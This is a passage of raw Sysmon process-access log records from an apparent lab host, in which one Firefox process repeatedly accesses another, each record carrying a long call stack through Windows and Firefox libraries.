Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla 
Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla 
Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla 
Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program 
Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program 
Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program 
Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla 
Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000016990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program 
Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 